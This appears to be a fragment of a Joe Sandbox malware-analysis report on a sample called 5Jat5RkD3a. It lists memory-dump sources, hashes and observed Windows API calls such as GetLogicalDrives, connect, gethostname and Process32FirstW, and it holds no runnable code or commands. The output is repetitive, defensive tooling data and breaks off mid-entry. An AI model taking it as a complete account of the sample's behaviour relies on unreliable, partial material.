                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 0504d4a8ff3c61593d3fc7ea7e4905cf0b2f7f6e42490bc150fad7ea08788961
                                                              • Instruction ID: a95804bacbe10e4cc53ff250a5184216188323d9c5a986b5cc2e6a18ea47bc83
                                                              • Opcode Fuzzy Hash: 0504d4a8ff3c61593d3fc7ea7e4905cf0b2f7f6e42490bc150fad7ea08788961
                                                              • Instruction Fuzzy Hash: 4D41D4FB11C115FEB202C6416B54AFE6B6DE7C7730B30C62AF4A7D6202E7A44AC98531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 537550534cbc1057759f5e6e17187122705c1656f45484c0c1a683c9f281619c
                                                              • Instruction ID: 01077cbc5174b4c5a505f4a0b544c06efe233d0aff58febec45426ae4b422239
                                                              • Opcode Fuzzy Hash: 537550534cbc1057759f5e6e17187122705c1656f45484c0c1a683c9f281619c
                                                              • Instruction Fuzzy Hash: CF41D4FB11C110FEB202C6416B54AFE6B6DE7C7730B30C62AF4A7D6202E6A44AC99531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 9f6ce46da1b700a643425620ce6b83e6f7f9a7e80653989c0e9141fc7b6cf4e2
                                                              • Instruction ID: fd31320c2b421952ed0b62ada0e11414289a206698d8695639056daeaf4daf89
                                                              • Opcode Fuzzy Hash: 9f6ce46da1b700a643425620ce6b83e6f7f9a7e80653989c0e9141fc7b6cf4e2
                                                              • Instruction Fuzzy Hash: F041D7FB11C115BEB202C6416B54AFE676DE7C7730B30866AF4A7C6102E6A44AC98531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 4d0438c649dc0f616ec57961ec4078e2aee2ce8297231179504628f3aba1a548
                                                              • Instruction ID: 0f2d9de7aae85c74e1129491ce413738732b025cbdac4050299a48f2685da065
                                                              • Opcode Fuzzy Hash: 4d0438c649dc0f616ec57961ec4078e2aee2ce8297231179504628f3aba1a548
                                                              • Instruction Fuzzy Hash: 1041E4FB11C114FEB201C6416B54AFE676DE7C7730B30C62AF4A7D6202E7A44AC99531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 3d1d2a78c29d5aff78ccca94b32d6d84c0fc88870758f52f05d5f88aca0ee8a2
                                                              • Instruction ID: 3251358bbfbd88ceb23dbb7197adc345a0735dcffd108ac8085c4090ff944a53
                                                              • Opcode Fuzzy Hash: 3d1d2a78c29d5aff78ccca94b32d6d84c0fc88870758f52f05d5f88aca0ee8a2
                                                              • Instruction Fuzzy Hash: 0941E7FB11C114BE7201C6416B64AFF6B6DE7C7730B30C66AF4A7D6202E7944AC98531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 72203e8e9d61504eef0380a687ba9367659b912ebc8954849a2ac35c4255e8cb
                                                              • Instruction ID: 611b3aa7a3505ea4312d00634c27a000642da309271df85c55382d7d23ea3653
                                                              • Opcode Fuzzy Hash: 72203e8e9d61504eef0380a687ba9367659b912ebc8954849a2ac35c4255e8cb
                                                              • Instruction Fuzzy Hash: 5041C6FB21C110FEB202C6416B54AFE676DE7C7330B30C66AF4A7D6202E7A44AC99531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: bc1b0b16d61058f2f6db8e4f4950c5f739df9a2229fe09ca59279c89e02a4b67
                                                              • Instruction ID: 66b1dd477e4ca9b8ac003d15a1aa94d3e0a95f8007746de69c6850883533e082
                                                              • Opcode Fuzzy Hash: bc1b0b16d61058f2f6db8e4f4950c5f739df9a2229fe09ca59279c89e02a4b67
                                                              • Instruction Fuzzy Hash: 6D41D3FB21C111BDB202C6416B54AFE676DE7C7330B30C66AF4A7D6202E7A44ACA9531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 9c7cb96a048af187b3e9da76ddcc406bd98681a3d93752301766c76599d646d2
                                                              • Instruction ID: 7b36364a7d9f85a35038fec1591f996c261322f6d3d4f98907359236d73c950a
                                                              • Opcode Fuzzy Hash: 9c7cb96a048af187b3e9da76ddcc406bd98681a3d93752301766c76599d646d2
                                                              • Instruction Fuzzy Hash: 3A31E7F721C254FEB202C6416B54AFE277DE7C7330B30C56AF4A7C6202E6A45AC98631
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: CloseEvent
                                                              • String ID: multi.c
                                                              • API String ID: 2624557715-214371023
                                                              • Opcode ID: a6606d555aec4f2fe20f524fce77ef921c88f4b6bb8c7fa342824fde132d94d2
                                                              • Instruction ID: 274e225667fcd00388ef35551ab51dfc8a07d25bcce6631874cfb642948d136c
                                                              • Opcode Fuzzy Hash: a6606d555aec4f2fe20f524fce77ef921c88f4b6bb8c7fa342824fde132d94d2
                                                              • Instruction Fuzzy Hash: 9A511AB19283019BDB50AF309D46B573698BF41318F088478ED4D9B253FB75E528CBA3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: db5c54718135ea0619a93b906869f9fbc560296ad8c45019b346fdf252b2b0fd
                                                              • Instruction ID: 9050f492cc4ccecf8caa8a2c8b1f43730c646d8749e052b3f6ec75ad24220934
                                                              • Opcode Fuzzy Hash: db5c54718135ea0619a93b906869f9fbc560296ad8c45019b346fdf252b2b0fd
                                                              • Instruction Fuzzy Hash: F231E5F621C115FEB201C6416B54AFE67ADE7C7330B30C56AF4A7C6202E7A45AC98531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: c55e72da8d10147271414a6c2a0231f70d2782a35148479888c16a9fc6b9e7b7
                                                              • Instruction ID: 9d5bd45d64b314eb8003c44a05a4b347a102a8075f7d2f1374dcda0a70a4febc
                                                              • Opcode Fuzzy Hash: c55e72da8d10147271414a6c2a0231f70d2782a35148479888c16a9fc6b9e7b7
                                                              • Instruction Fuzzy Hash: 3231B2FB21C114FEB201C6416B64AFE676DE7C7330B30C66AF4A7C6202E7A45AC98531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 1fecc070c9e4d669898ac0ed2aee1fb83d78a5878408ed096083054b61d369e5
                                                              • Instruction ID: 6e0039da3addba8313e753d7451a1ea599ce5b55ebcae9878d4d8736a2aaa098
                                                              • Opcode Fuzzy Hash: 1fecc070c9e4d669898ac0ed2aee1fb83d78a5878408ed096083054b61d369e5
                                                              • Instruction Fuzzy Hash: A431F4F621C154FEB201C6416B64AFE6BACEBC7730B30856AF4A7D6102E6644AC98531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: ac2669b72f365c4cba8a47fccd40e0c06554ff3b684d2f69561f53c89c8e055e
                                                              • Instruction ID: 60dc80a4c663c6857db17262b3225ba234ebf5a788165767dec4f691901d761a
                                                              • Opcode Fuzzy Hash: ac2669b72f365c4cba8a47fccd40e0c06554ff3b684d2f69561f53c89c8e055e
                                                              • Instruction Fuzzy Hash: 2431A1F621C115FEB201C6416B64AFE277DE7C7730B31C66AF4A7C6202E7A45AC98531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 7062bd970c4cfa05eef6fc7fadc5f4646c74e1a249358a37b80519af6ced3bc3
                                                              • Instruction ID: eb749f240ca5f6411f1e52c665e3c553341f8e302b9b1a4a378e252d2aaeeeca
                                                              • Opcode Fuzzy Hash: 7062bd970c4cfa05eef6fc7fadc5f4646c74e1a249358a37b80519af6ced3bc3
                                                              • Instruction Fuzzy Hash: C131B3F621C115FEB201C6416B64AFE677DE7C7730B30C66AF4A7C6102E7A49AC98931
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: df122a75c7f313e1af721e903a7609449ff1a914280a88ed4d8369c98db682b4
                                                              • Instruction ID: 7e9c8d81dd30abda4a83e8bc0df74bb13c8220cc9fa418df3c8941bc689cce07
                                                              • Opcode Fuzzy Hash: df122a75c7f313e1af721e903a7609449ff1a914280a88ed4d8369c98db682b4
                                                              • Instruction Fuzzy Hash: 8F31B1F621C155FEB201C6416B24AFE6B7CE7C3730B31C66BF4A6C6102E7A44AC98931
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 1ab44fe4114e3c871dffc9e148c91e2d8404c19a25875e245c161bd2dd9fc1d0
                                                              • Instruction ID: 064cd6b6fdcb087f5ea881d02897b432f878000e911be06bafc0cebc87a4cbd9
                                                              • Opcode Fuzzy Hash: 1ab44fe4114e3c871dffc9e148c91e2d8404c19a25875e245c161bd2dd9fc1d0
                                                              • Instruction Fuzzy Hash: 8231A0F621C254FEB201C6416B64AFE676CE7C7730B31C66BF4A7D6102E7644AC98931
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 4ac8438949f6b13a977751297e1f2194058eeb18b379971ebec7a8c56feadbe1
                                                              • Instruction ID: 937b41a0019afb40e5aa96300f56b85366cad22cb79f802a5898124b5f34be51
                                                              • Opcode Fuzzy Hash: 4ac8438949f6b13a977751297e1f2194058eeb18b379971ebec7a8c56feadbe1
                                                              • Instruction Fuzzy Hash: DB31D5F661C110BEB201C651AB54AFF3B7CE7D3730B31C66AF4A6C5101E2648ACA8931
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 242ecabaf6fca4ac1d2606c38e7bde6a1f3efefac1d7ced7533a156268e5fa15
                                                              • Instruction ID: 38555bfbacf95d0e87948ad7d038e99383e43f1455f4db0ac6b2a76e8662d425
                                                              • Opcode Fuzzy Hash: 242ecabaf6fca4ac1d2606c38e7bde6a1f3efefac1d7ced7533a156268e5fa15
                                                              • Instruction Fuzzy Hash: 8D21D3F761C111BEB201C6916B54AFF2B7CE7D3730B31C96AF4A6C5101E2688ECA8931
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 875a9ce3e04558df1b9a48110e8222a90f98b4c00ab2b82b5be806b4c8c4b4b8
                                                              • Instruction ID: b9c675c81d1fdc8b6fe710b9d7550553e684bdeda591135af40e47857b838691
                                                              • Opcode Fuzzy Hash: 875a9ce3e04558df1b9a48110e8222a90f98b4c00ab2b82b5be806b4c8c4b4b8
                                                              • Instruction Fuzzy Hash: 61218EF761C114BEB201C6426B24AFE277CE7C3730B31C56BF4A7C5101E6A49A8D9531
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 3af65ed25675f09a3f4209e0bbdbcaae1a4ea6b53eac787e782e755d7dba1999
                                                              • Instruction ID: 6234f00c788037b625f5fc3d057dbd701488228d915991e8f29c0a0406ecd82b
                                                              • Opcode Fuzzy Hash: 3af65ed25675f09a3f4209e0bbdbcaae1a4ea6b53eac787e782e755d7dba1999
                                                              • Instruction Fuzzy Hash: 1E217FF721C210BEB201C6426B14AFE6B6CE7C3730B31C56BF4A6C5101E6A48A8D9531
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,0000008A), ref: 07010D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 59b48297db5f05d48ecec26933117dde0d72f6ace72cf7f89407f937eed7a87a
                                                              • Instruction ID: 72357a3c31b8d8062f0429d13367a085341fda5a4f6e000cd4f08534ac7aae01
                                                              • Opcode Fuzzy Hash: 59b48297db5f05d48ecec26933117dde0d72f6ace72cf7f89407f937eed7a87a
                                                              • Instruction Fuzzy Hash: 1521A1F621C214BEB201C6526B10AFE2BBCE7C2730F31C56BF4A6C5101E76489C98531
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: 899bee5c1c3e313d15cabc341f4b0f9109a8089058e0c2801428e5c644727470
                                                              • Instruction ID: b699b75953b184d6d904eb5f3ff33bca2872499979a6e7c47b7d0a60cd4924cc
                                                              • Opcode Fuzzy Hash: 899bee5c1c3e313d15cabc341f4b0f9109a8089058e0c2801428e5c644727470
                                                              • Instruction Fuzzy Hash: 18D0A7339192316B8530695ABC49C4F7BA8DDCAF60F064C58FD54B7301D1309C1087F2
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0033B29E,?,00000000,?,?), ref: 0033B0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00323C41,00000000), ref: 0033B0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: ce0adc30f87f8709779b31c2b8e6a6377d90cd378c49c52f9b92f8b8ef9ff1c5
                                                              • Instruction ID: c954dbf4142914630fb89b7740b0fb52a0ee0bc177c1914de348d23dacf2bb9c
                                                              • Opcode Fuzzy Hash: ce0adc30f87f8709779b31c2b8e6a6377d90cd378c49c52f9b92f8b8ef9ff1c5
                                                              • Instruction Fuzzy Hash: 0D01D8363042009BCA255A68CCC4E6BF399FF89364F050B64FA78971E1D726ED509751
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00324AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 93cd64784a45e4f92347083d4d6b2a164e14f2cb53fb14205ac8236aec929978
                                                              • Instruction ID: 8662b8b265def08137c3a0d4d70e811eca97902e70744009070de240446c35d9
                                                              • Opcode Fuzzy Hash: 93cd64784a45e4f92347083d4d6b2a164e14f2cb53fb14205ac8236aec929978
                                                              • Instruction Fuzzy Hash: 0651F2B06047208BEB329B25FD4972376E4AF45715F15183CE98A8AAD1E775EC84CB42
                                                              APIs
                                                              • Process32FirstW.KERNEL32(000000AA,?,000000AA,?), ref: 07060417
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561723832.0000000007060000.00000040.00001000.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7060000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 0077ce1a48bd13f7965de2cac1ccf669b787ac9839ad1c930a85bfd81494303e
                                                              • Instruction ID: 1b37b5740615017850da2ab1b931e1bc2da700f268d1b2e61566044815bb7153
